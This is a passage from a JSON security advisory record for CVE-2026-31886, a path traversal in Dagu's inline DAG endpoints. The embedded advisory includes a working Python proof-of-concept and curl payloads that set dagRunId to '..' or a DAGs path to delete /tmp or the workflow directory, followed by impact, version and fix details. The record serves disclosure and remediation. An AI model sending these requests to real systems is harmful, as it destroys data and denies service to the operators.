json.loads(resp.read())\n            token = data.get(\"token\") or data.get(\"accessToken\")\n            if not token:\n                print(f\"Login response did 
not contain a token: {data}\")\n                sys.exit(1)\n            return token\n    except urllib.error.HTTPError as e:\n        print(f\"Login failed (HTTP {e.code}): {e.read().decode()}\")\n        sys.exit(1)\n\n\ndef send_exploit(base_url, token, traversal):\n    body = json.dumps({\n        \"spec\": \"steps:\\n  - name: s\\n    command: id\\n\",\n        \"dagRunId\": traversal,\n    }).encode()\n    headers = {\"Content-Type\": \"application/json\"}\n    if token:\n        headers[\"Authorization\"] = f\"Bearer {token}\"\n    req = urllib.request.Request(\n        f\"{base_url}/api/v1/dag-runs\",\n        data=body,\n        headers=headers,\n        method=\"POST\",\n    )\n    try:\n        with urllib.request.urlopen(req, timeout=15) as resp:\n            return resp.status, json.loads(resp.read())\n    except urllib.error.HTTPError as e:\n        return e.code, e.read().decode()\n\n\ndef main():\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"--url\", default=\"http://localhost:8080\")\n    parser.add_argument(\"--token\", default=\"\")\n    parser.add_argument(\"--username\", default=\"admin\")\n    parser.add_argument(\"--password\", default=\"\")\n    parser.add_argument(\"--traversal\", default=\"..\",\n                        help=\"Value for dagRunId (default: '..')\")\n    args = parser.parse_args()\n\n    base_url = args.url.rstrip(\"/\")\n    traversal = args.traversal\n\n    import posixpath\n    name_hint = \"inline\"\n    expected_dir = posixpath.normpath(f\"/tmp/{name_hint}/{traversal}\")\n    print(f\"Target server : {base_url}\")\n    print(f\"dagRunId value: {repr(traversal)}\")\n    print(f\"Resolved tmpDir (Linux): filepath.Join('/tmp', '{name_hint}', '{traversal}') = '{expected_dir}'\")\n    print(f\"os.RemoveAll will target: '{expected_dir}'\")\n    print()\n\n    token = args.token\n    if not token and args.password:\n        print(\"Obtaining JWT token...\")\n        token = login(base_url, args.username, 
args.password)\n        print(f\"Token obtained: {token[:30]}...\")\n    elif not token:\n        print(\"No token provided. Proceeding without authentication (requires auth.mode: none).\")\n    print()\n\n    tmp_before = os.path.exists(expected_dir) if os.path.isabs(expected_dir) else None\n    if tmp_before is not None:\n        print(f\"'{expected_dir}' exists before request: {tmp_before}\")\n\n    print(f\"Sending request to {base_url}/api/v1/dag-runs ...\")\n    status, body = send_exploit(base_url, token, traversal)\n    print(f\"HTTP {status}: {body}\")\n    print()\n\n    if status not in (200, 201):\n        print(f\"Unexpected status {status}. Check credentials or server configuration.\")\n        sys.exit(1)\n\n    time.sleep(0.5)\n\n    if tmp_before is not None:\n        tmp_after = os.path.exists(expected_dir)\n        print(f\"'{expected_dir}' exists after request: {tmp_after}\")\n        if not tmp_after:\n            print()\n            print(\"CONFIRMED: path traversal caused os.RemoveAll to delete the target directory.\")\n        else:\n            print()\n            print(\"Directory still exists. 
If running against a remote server, check\")\n            print(f\"on the server host whether '{expected_dir}' was modified.\")\n    else:\n        print(f\"Cannot verify filesystem state from this host.\")\n        print(f\"On the server, check whether '{expected_dir}' was modified after the request.\")\n\n\nif __name__ == \"__main__\":\n    main()\n```\n\n### Local test setup (no existing dagu installation needed)\n\n```bash\n# Download the latest dagu binary\ncurl -L https://github.com/dagu-org/dagu/releases/latest/download/dagu_linux_amd64.tar.gz \\\n  | tar -xz\n\n# Start with no authentication for simplest reproduction\ncat > /tmp/dagu-test.yaml <<'EOF'\nauth:\n  mode: none\nEOF\n\n./dagu server --config /tmp/dagu-test.yaml &\nSERVER_PID=$!\nsleep 2\n\n# Confirm /tmp is accessible\necho \"Files in /tmp before: $(ls /tmp | wc -l)\"\n\n# Run the exploit\ncurl -s -X POST http://localhost:8080/api/v1/dag-runs \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"spec\":\"steps:\\n  - name: s\\n    command: id\\n\",\"dagRunId\":\"..\"}'\n\nsleep 1\n\n# Check whether dagu-owned temp files were deleted\necho \"Files in /tmp after:  $(ls /tmp | wc -l)\"\n\nkill $SERVER_PID\n```\n\n### Variant: target the enqueue endpoint\n\nBoth endpoints are affected via the same `loadInlineDAG` call:\n\n```bash\ncurl -s -X POST http://TARGET:8080/api/v1/dag-runs/enqueue \\\n  -H \"Content-Type: application/json\" \\\n  -H \"Authorization: Bearer $TOKEN\" \\\n  -d '{\"spec\":\"steps:\\n  - name: s\\n    command: id\\n\",\"dagRunId\":\"..\"}'\n```\n\n### Variant: file write outside /tmp\n\nWith a `dagRunId` value that traverses to a known writable directory, the spec content is written there as `<nameHint>.yaml` before the cleanup removes that directory:\n\n```json\n{\n  \"spec\": \"steps:\\n  - name: s\\n    command: id\\n\",\n  \"name\": \"payload\",\n  \"dagRunId\": \"../../home/dagu/dags\"\n}\n```\n\nThis writes `/home/dagu/dags/payload.yaml`, executes it, then calls 
`os.RemoveAll(\"/home/dagu/dags\")`, deleting the entire DAGs directory. The exact path depends on the deployment but can be inferred from error messages or default paths.\n\n\n## 7. Impact\n\n**Denial of Service (primary)**\n\nOn every deployment, an authenticated operator can send one request to trigger `os.RemoveAll` on a directory outside the intended temp subdirectory. With `dagRunId=\"..\"`, the target is `/tmp`. On a non-root deployment with Linux sticky bit semantics, all temp files in `/tmp` created by the dagu user are deleted. Any running dagu workflow that depends on temp files in progress is interrupted. The attack can be repeated continuously with no rate limiting, preventing recovery.\n\nOn Docker-based deployments where dagu runs as root inside a container (a common pattern for dagu installations), `os.RemoveAll(\"/tmp\")` removes all contents of `/tmp` inside the container. This affects every process in the container that uses `/tmp`, including shared libraries unpacked at runtime, unix sockets, and lock files.\n\n**Arbitrary file write (secondary)**\n\nThe spec YAML content provided by the attacker is written to `filepath.Join(tmpDir, nameHint+\".yaml\")` where both `tmpDir` and `nameHint` can be influenced. If the attacker knows or can guess the path of a directory writable by the dagu process (for example, the DAGs directory), they can write arbitrary YAML content there. Because `spec.Load` reads from that path and executes the spec, this also provides a mechanism for persisting a workflow definition containing attacker-controlled commands in the DAGs directory before the cleanup removes it.\n\n**Deletion of the DAGs directory (combined)**\n\nThe combination of the file write and the cleanup allows an authenticated operator to permanently delete the entire DAGs directory in a single request by pointing `dagRunId` at that path. This destroys all workflow definitions for all users of the dagu instance.\n\n\n## 8. 
Affected Versions\n\nThe `loadInlineDAG` function and both calling handlers (`ExecuteDAGRunFromSpec` and `EnqueueDAGRunFromSpec`) are present in the current `main` branch. The vulnerability has existed since these endpoints were introduced. No fix is present as of the review date of 2026-02-24.\n\nAuthentication requirements differ by version:\n- Versions 1.30.3 and earlier: default `auth.mode` was `none`, so this is exploitable without credentials\n- Versions after 1.30.3: default `auth.mode` is `builtin`, so operator-level credentials are required\n\n\n## 9. Recommended Fix\n\nValidate `dagRunID` before use in `loadInlineDAG`. The OpenAPI schema already defines the correct pattern. Enforce it at the application layer:\n\n```go\n// Add at the start of loadInlineDAG, before filepath.Join:\nvar validDAGRunID = regexp.MustCompile(`^[a-zA-Z0-9_-]+$`)\n\nif dagRunID != \"\" && !validDAGRunID.MatchString(dagRunID) {\n    return nil, func() {}, &Error{\n        HTTPStatus: http.StatusBadRequest,\n        Code:       api.ErrorCodeBadRequest,\n        Message:    \"dagRunId contains invalid characters\",\n    }\n}\n```\n\nAs a defense-in-depth measure, verify that the resolved `tmpDir` is actually inside the expected base after joining:\n\n```go\ntmpDir := filepath.Join(os.TempDir(), nameHint, dagRunID)\nexpectedBase := filepath.Join(os.TempDir(), nameHint)\nif !strings.HasPrefix(tmpDir+string(filepath.Separator), expectedBase+string(filepath.Separator)) {\n    return nil, func() {}, &Error{\n        HTTPStatus: http.StatusBadRequest,\n        Code:       api.ErrorCodeBadRequest,\n        Message:    \"dagRunId resolves outside the permitted temp directory\",\n    }\n}\n```\n\nNote that this prefix comparison is lexical and also passes when `tmpDir` equals `expectedBase`; if an empty `dagRunID` can reach this point (the pattern check above skips empty values), the deferred `os.RemoveAll` would then remove the shared `<nameHint>` directory, so an empty value should be rejected or replaced with a generated ID before the join.\n\nThe same fix must be applied to both `ExecuteDAGRunFromSpec` and `EnqueueDAGRunFromSpec`. Additionally, enabling `StrictValidation: true` as the default configuration would provide an extra layer of enforcement at the API boundary.",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-m4q3-457p-hh2x.json?alt=media"
                },
                {
                    "category": "description",
                    "text": "Dagu: Path Traversal via `dagRunId` in Inline DAG Execution in github.com/dagu-org/dagu",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4693.json?alt=media"
                },
                {
                    "category": "description",
                    "text": "Dagu is a workflow engine with a built-in Web user interface. Prior to 2.2.4, the dagRunId request field accepted by the inline DAG execution endpoints is passed directly into filepath.Join to construct a temporary directory path without any format validation. Go's filepath.Join resolves .. segments lexically, so a caller can supply a value such as \"..\" to redirect the computed directory outside the intended /tmp/<name>/<id> path. A deferred cleanup function that calls os.RemoveAll on that directory then runs unconditionally when the HTTP handler returns, deleting whatever directory the traversal resolved to. With dagRunId set to \"..\", the resolved directory is the system temporary directory (/tmp on Linux). On non-root deployments, os.RemoveAll(\"/tmp\") removes all files in /tmp owned by the dagu process user, disrupting every concurrent dagu run that has live temp files. On root or Docker deployments, the call removes the entire contents of /tmp, causing a system-wide denial of service. This vulnerability is fixed in 2.2.4.",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/GIT%2FCVE-2026-31886.json?alt=media"
                },
                {
                    "category": "other",
                    "text": "0.00148",
                    "title": "EPSS"
                },
                {
                    "category": "other",
                    "text": "3.8",
                    "title": "NCSC Score"
                },
                {
                    "category": "other",
                    "text": "Exploit code publicly available, There is exploit data available from source Nvd",
                    "title": "NCSC Score top decreasing factors"
                }
            ],
            "product_status": {
                "known_affected": [
                    "CSAFPID-5825017",
                    "CSAFPID-5844410",
                    "CSAFPID-5907261",
                    "CSAFPID-5700905",
                    "CSAFPID-5700906",
                    "CSAFPID-5700907",
                    "CSAFPID-5700908",
                    "CSAFPID-5700909",
                    "CSAFPID-5700910",
                    "CSAFPID-5700911",
                    "CSAFPID-5700912",
                    "CSAFPID-5700913",
                    "CSAFPID-5700914",
                    "CSAFPID-5700915",
                    "CSAFPID-5700916",
                    "CSAFPID-5700917",
                    "CSAFPID-5700918",
                    "CSAFPID-5700919",
                    "CSAFPID-5700920",
                    "CSAFPID-5700921",
                    "CSAFPID-5700922",
                    "CSAFPID-5700923",
                    "CSAFPID-5700924",
                    "CSAFPID-5700925",
                    "CSAFPID-5700926",
                    "CSAFPID-5700927",
                    "CSAFPID-5700928",
                    "CSAFPID-5700929",
                    "CSAFPID-5700930",
                    "CSAFPID-5700931",
                    "CSAFPID-5700932",
                    "CSAFPID-5700933",
                    "CSAFPID-5700934",
                    "CSAFPID-5700935",
                    "CSAFPID-5700936",
                    "CSAFPID-5700937",
                    "CSAFPID-5700938",
                    "CSAFPID-5700939",
                    "CSAFPID-5700940",
                    "CSAFPID-5700941",
                    "CSAFPID-5700942",
                    "CSAFPID-5700943",
                    "CSAFPID-5700944",
                    "CSAFPID-5700945",
                    "CSAFPID-5700946",
                    "CSAFPID-5700947",
                    "CSAFPID-5700948",
                    "CSAFPID-5700949",
                    "CSAFPID-5700950",
                    "CSAFPID-5700951",
                    "CSAFPID-5700952",
                    "CSAFPID-5700953",
                    "CSAFPID-5700954",
                    "CSAFPID-5700955",
                    "CSAFPID-5700956",
                    "CSAFPID-5700957",
                    "CSAFPID-5700958",
                    "CSAFPID-5700959",
                    "CSAFPID-5700960",
                    "CSAFPID-5700961",
                    "CSAFPID-5700962",
                    "CSAFPID-5700963",
                    "CSAFPID-5700964",
                    "CSAFPID-5700965",
                    "CSAFPID-5700966",
                    "CSAFPID-5700967",
                    "CSAFPID-5700968",
                    "CSAFPID-5700969",
                    "CSAFPID-5700970",
                    "CSAFPID-5700971",
                    "CSAFPID-5700972",
                    "CSAFPID-5700973",
                    "CSAFPID-5700974",
                    "CSAFPID-5700975",
                    "CSAFPID-5700976",
                    "CSAFPID-5700977",
                    "CSAFPID-5700978",
                    "CSAFPID-5700979",
                    "CSAFPID-5700980",
                    "CSAFPID-5700981",
                    "CSAFPID-5700982",
                    "CSAFPID-5700983",
                    "CSAFPID-5700984",
                    "CSAFPID-5700985",
                    "CSAFPID-5700986",
                    "CSAFPID-5700987",
                    "CSAFPID-5700988",
                    "CSAFPID-5700989",
                    "CSAFPID-5700990",
                    "CSAFPID-5700991",
                    "CSAFPID-5700992",
                    "CSAFPID-5700993",
                    "CSAFPID-5700994",
                    "CSAFPID-5700995",
                    "CSAFPID-5700996",
                    "CSAFPID-5700997",
                    "CSAFPID-5700998",
                    "CSAFPID-5700999",
                    "CSAFPID-5701000",
                    "CSAFPID-5701001",
                    "CSAFPID-5701002",
                    "CSAFPID-5701003",
                    "CSAFPID-5701004",
                    "CSAFPID-5701005",
                    "CSAFPID-5701006",
                    "CSAFPID-5701007",
                    "CSAFPID-5701008",
                    "CSAFPID-5701009",
                    "CSAFPID-5701010",
                    "CSAFPID-5701011",
                    "CSAFPID-5701012",
                    "CSAFPID-5701013",
                    "CSAFPID-5701014",
                    "CSAFPID-5701015",
                    "CSAFPID-5701016",
                    "CSAFPID-5701017",
                    "CSAFPID-5701018",
                    "CSAFPID-5701019",
                    "CSAFPID-5701020",
                    "CSAFPID-5701021",
                    "CSAFPID-5701022",
                    "CSAFPID-5701023",
                    "CSAFPID-5701024",
                    "CSAFPID-5701025",
                    "CSAFPID-5701026",
                    "CSAFPID-5701027",
                    "CSAFPID-5701028",
                    "CSAFPID-5701029",
                    "CSAFPID-5701030",
                    "CSAFPID-5730985",
                    "CSAFPID-5730986",
                    "CSAFPID-5730987",
                    "CSAFPID-5730988",
                    "CSAFPID-5730989",
                    "CSAFPID-5730990",
                    "CSAFPID-5730991",
                    "CSAFPID-5730992",
                    "CSAFPID-5730993",
                    "CSAFPID-5730994",
                    "CSAFPID-5730995",
                    "CSAFPID-5730996",
                    "CSAFPID-5730997",
                    "CSAFPID-5730998",
                    "CSAFPID-5730999",
                    "CSAFPID-5731000",
                    "CSAFPID-5731001",
                    "CSAFPID-5731002",
                    "CSAFPID-5731003",
                    "CSAFPID-5731004",
                    "CSAFPID-5731005",
                    "CSAFPID-5731006",
                    "CSAFPID-5731007",
                    "CSAFPID-5731008",
                    "CSAFPID-5731009",
                    "CSAFPID-5731010",
                    "CSAFPID-5731011",
                    "CSAFPID-5731012",
                    "CSAFPID-5731013",
                    "CSAFPID-5731014",
                    "CSAFPID-5731015",
                    "CSAFPID-5731016",
                    "CSAFPID-5731017",
                    "CSAFPID-5731018",
                    "CSAFPID-5731019",
                    "CSAFPID-5731020",
                    "CSAFPID-5731021",
                    "CSAFPID-5731022",
                    "CSAFPID-5731023",
                    "CSAFPID-5731024",
                    "CSAFPID-5731025",
                    "CSAFPID-5731026",
                    "CSAFPID-5731027",
                    "CSAFPID-5731028",
                    "CSAFPID-5731029",
                    "CSAFPID-5731030",
                    "CSAFPID-5731031",
                    "CSAFPID-5731032",
                    "CSAFPID-5731033",
                    "CSAFPID-5731034",
                    "CSAFPID-5731035",
                    "CSAFPID-5731036",
                    "CSAFPID-5731037",
                    "CSAFPID-5731038",
                    "CSAFPID-5731039",
                    "CSAFPID-5731040",
                    "CSAFPID-5731041",
                    "CSAFPID-5731042",
                    "CSAFPID-5731043",
                    "CSAFPID-5731044",
                    "CSAFPID-5731045",
                    "CSAFPID-5731046",
                    "CSAFPID-5731047",
                    "CSAFPID-5731048",
                    "CSAFPID-5731049",
                    "CSAFPID-5731050",
                    "CSAFPID-5731051",
                    "CSAFPID-5731052",
                    "CSAFPID-5731053",
                    "CSAFPID-5910285",
                    "CSAFPID-5910286",
                    "CSAFPID-5910287",
                    "CSAFPID-5910288",
                    "CSAFPID-5910289",
                    "CSAFPID-5910290",
                    "CSAFPID-5910291",
                    "CSAFPID-5910292",
                    "CSAFPID-5910293",
                    "CSAFPID-5910294",
                    "CSAFPID-5910295",
                    "CSAFPID-5910296",
                    "CSAFPID-5910297",
                    "CSAFPID-5910298"
                ]
            },
            "references": [
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://github.com/advisories/GHSA-m4q3-457p-hh2x"
                },
                {
                    "category": "external",
                    "summary": "Source raw - github",
                    "url": "https://api.github.com/advisories/GHSA-m4q3-457p-hh2x"
                },
                {
                    "category": "external",
                    "summary": "Source - cveprojectv5",
                    "url": "https://www.cve.org/CVERecord?id=CVE-2026-31886"
                },
                {
                    "category": "external",
                    "summary": "Source raw - cveprojectv5",
                    "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/31xxx/CVE-2026-31886.json"
                },
                {
                    "category": "external",
                    "summary": "Source - nvd",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31886"
                },
                {
                    "category": "external",
                    "summary": "Source raw - nvd",
                    "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-31886"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-31886"
                },
                {
                    "category": "external",
                    "summary": "Source raw - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://api.github.com/advisories/GHSA-m4q3-457p-hh2x"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-m4q3-457p-hh2x.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4693.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/GIT%2FCVE-2026-31886.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv",
                    "url": "https://github.com/dagu-org/dagu/security/advisories/GHSA-m4q3-457p-hh2x"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://github.com/advisories/GHSA-m4q3-457p-hh2x"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv",
                    "url": "https://github.com/dagu-org/dagu/commit/12c2e5395bd9331d49ca103593edfd0db39c4f38"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; osv",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31886"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; osv",
                    "url": "https://pkg.go.dev/vuln/GO-2026-4693"
                },
                {
                    "category": "external",
                    "summary": "Reference - osv",
                    "url": "https://github.com/CVEProject/cvelistV5/tree/main/cves/2026/31xxx/CVE-2026-31886.json"
                }
            ],
            "scores": [
                {
                    "cvss_v3": {
                        "version": "3.1",
                        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:H",
                        "baseScore": 9.1,
                        "baseSeverity": "CRITICAL"
                    },
                    "products": [
                        "CSAFPID-5700905",
                        "CSAFPID-5700906",
                        "CSAFPID-5700907",
                        "CSAFPID-5700908",
                        "CSAFPID-5700909",
                        "CSAFPID-5700910",
                        "CSAFPID-5700911",
                        "CSAFPID-5700912",
                        "CSAFPID-5700913",
                        "CSAFPID-5700914",
                        "CSAFPID-5700915",
                        "CSAFPID-5700916",
                        "CSAFPID-5700917",
                        "CSAFPID-5700918",
                        "CSAFPID-5700919",
                        "CSAFPID-5700920",
                        "CSAFPID-5700921",
                        "CSAFPID-5700922",
                        "CSAFPID-5700923",
                        "CSAFPID-5700924",
                        "CSAFPID-5700925",
                        "CSAFPID-5700926",
                        "CSAFPID-5700927",
                        "CSAFPID-5700928",
                        "CSAFPID-5700929",
                        "CSAFPID-5700930",
                        "CSAFPID-5700931",
                        "CSAFPID-5700932",
                        "CSAFPID-5700933",
                        "CSAFPID-5700934",
                        "CSAFPID-5700935",
                        "CSAFPID-5700936",
                        "CSAFPID-5700937",
                        "CSAFPID-5700938",
                        "CSAFPID-5700939",
                        "CSAFPID-5700940",
                        "CSAFPID-5700941",
                        "CSAFPID-5700942",
                        "CSAFPID-5700943",
                        "CSAFPID-5700944",
                        "CSAFPID-5700945",
                        "CSAFPID-5700946",
                        "CSAFPID-5700947",
                        "CSAFPID-5700948",
                        "CSAFPID-5700949",
                        "CSAFPID-5700950",
                        "CSAFPID-5700951",
                        "CSAFPID-5700952",
                        "CSAFPID-5700953",
                        "CSAFPID-5700954",
                        "CSAFPID-5700955",
                        "CSAFPID-5700956",
                        "CSAFPID-5700957",
                        "CSAFPID-5700958",
                        "CSAFPID-5700959",
                        "CSAFPID-5700960",
                        "CSAFPID-5700961",
                        "CSAFPID-5700962",
                        "CSAFPID-5700963",
                        "CSAFPID-5700964",
                        "CSAFPID-5700965",
                        "CSAFPID-5700966",
                        "CSAFPID-5700967",
                        "CSAFPID-5700968",
                        "CSAFPID-5700969",
                        "CSAFPID-5700970",
                        "CSAFPID-5700971",
                        "CSAFPID-5700972",
                        "CSAFPID-5700973",
                        "CSAFPID-5700974",
                        "CSAFPID-5700975",
                        "CSAFPID-5700976",
                        "CSAFPID-5700977",
                        "CSAFPID-5700978",
                        "CSAFPID-5700979",
                        "CSAFPID-5700980",
                        "CSAFPID-5700981",
                        "CSAFPID-5700982",
                        "CSAFPID-5700983",
                        "CSAFPID-5700984",
                        "CSAFPID-5700985",
                        "CSAFPID-5700986",
                        "CSAFPID-5700987",
                        "CSAFPID-5700988",
                        "CSAFPID-5700989",
                        "CSAFPID-5700990",
                        "CSAFPID-5700991",
                        "CSAFPID-5700992",
                        "CSAFPID-5700993",
                        "CSAFPID-5700994",
                        "CSAFPID-5700995",
                        "CSAFPID-5700996",
                        "CSAFPID-5700997",
                        "CSAFPID-5700998",
                        "CSAFPID-5700999",
                        "CSAFPID-5701000",
                        "CSAFPID-5701001",
                        "CSAFPID-5701002",
                        "CSAFPID-5701003",
                        "CSAFPID-5701004",
                        "CSAFPID-5701005",
                        "CSAFPID-5701006",
                        "CSAFPID-5701007",
                        "CSAFPID-5701008",
                        "CSAFPID-5701009",
                        "CSAFPID-5701010",
                        "CSAFPID-5701011",
                        "CSAFPID-5701012",
                        "CSAFPID-5701013",
                        "CSAFPID-5701014",
                        "CSAFPID-5701015",
                        "CSAFPID-5701016",
                        "CSAFPID-5701017",
                        "CSAFPID-5701018",
                        "CSAFPID-5701019",
                        "CSAFPID-5701020",
                        "CSAFPID-5701021",
                        "CSAFPID-5701022",
                        "CSAFPID-5701023",
                        "CSAFPID-5701024",
                        "CSAFPID-5701025",
                        "CSAFPID-5701026",
                        "CSAFPID-5701027",
                        "CSAFPID-5701028",
                        "CSAFPID-5701029",
                        "CSAFPID-5701030",
                        "CSAFPID-5730985",
                        "CSAFPID-5730986",
                        "CSAFPID-5730987",
                        "CSAFPID-5730988",
                        "CSAFPID-5730989",
                        "CSAFPID-5730990",
                        "CSAFPID-5730991",
                        "CSAFPID-5730992",
                        "CSAFPID-5730993",
                        "CSAFPID-5730994",
                        "CSAFPID-5730995",
                        "CSAFPID-5730996",
                        "CSAFPID-5730997",
                        "CSAFPID-5730998",
                        "CSAFPID-5730999",
                        "CSAFPID-5731000",
                        "CSAFPID-5731001",
                        "CSAFPID-5731002",
                        "CSAFPID-5731003",
                        "CSAFPID-5731004",
                        "CSAFPID-5731005",
                        "CSAFPID-5731006",
                        "CSAFPID-5731007",
                        "CSAFPID-5731008",
                        "CSAFPID-5731009",
                        "CSAFPID-5731010",
                        "CSAFPID-5731011",
                        "CSAFPID-5731012",
                        "CSAFPID-5731013",
                        "CSAFPID-5731014",
                        "CSAFPID-5731015",
                        "CSAFPID-5731016",
                        "CSAFPID-5731017",
                        "CSAFPID-5731018",
                        "CSAFPID-5731019",
                        "CSAFPID-5731020",
                        "CSAFPID-5731021",
                        "CSAFPID-5731022",
                        "CSAFPID-5731023",
                        "CSAFPID-5731024",
                        "CSAFPID-5731025",
                        "CSAFPID-5731026",
                        "CSAFPID-5731027",
                        "CSAFPID-5731028",
                        "CSAFPID-5731029",
                        "CSAFPID-5731030",
                        "CSAFPID-5731031",
                        "CSAFPID-5731032",
                        "CSAFPID-5731033",
                        "CSAFPID-5731034",
                        "CSAFPID-5731035",
                        "CSAFPID-5731036",
                        "CSAFPID-5731037",
                        "CSAFPID-5731038",
                        "CSAFPID-5731039",
                        "CSAFPID-5731040",
                        "CSAFPID-5731041",
                        "CSAFPID-5731042",
                        "CSAFPID-5731043",
                        "CSAFPID-5731044",
                        "CSAFPID-5731045",
                        "CSAFPID-5731046",
                        "CSAFPID-5731047",
                        "CSAFPID-5731048",
                        "CSAFPID-5731049",
                        "CSAFPID-5731050",
                        "CSAFPID-5731051",
                        "CSAFPID-5731052",
                        "CSAFPID-5731053",
                        "CSAFPID-5825017",
                        "CSAFPID-5844410",
                        "CSAFPID-5907261",
                        "CSAFPID-5910285",
                        "CSAFPID-5910286",
                        "CSAFPID-5910287",
                        "CSAFPID-5910288",
                        "CSAFPID-5910289",
                        "CSAFPID-5910290",
                        "CSAFPID-5910291",
                        "CSAFPID-5910292",
                        "CSAFPID-5910293",
                        "CSAFPID-5910294",
                        "CSAFPID-5910295",
                        "CSAFPID-5910296",
                        "CSAFPID-5910297",
                        "CSAFPID-5910298"
                    ]
                }
            ],
            "title": "CVE-2026-31886"
        }
    ]
}